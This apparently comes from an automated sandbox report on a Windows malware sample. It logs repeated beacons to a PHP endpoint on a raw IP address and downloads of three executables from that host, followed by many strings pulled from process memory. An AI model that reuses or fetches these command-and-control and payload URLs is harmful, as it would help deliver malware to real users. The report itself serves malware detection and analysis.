              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C2160 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7E83C2160
              Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: unknownHTTP traffic detected: POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
              Source: explorer.exe, 00000005.00000003.1489437697.000000000A376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe
              Source: explorer.exe, 00000005.00000002.2685561102.000000000A37B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1489437697.000000000A376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe
              Source: explorer.exe, 00000005.00000002.2685561102.000000000A37B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1489437697.000000000A376000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/zx.exe
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic4
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: explorer.exe, 00000005.00000000.1416361208.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2675911061.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
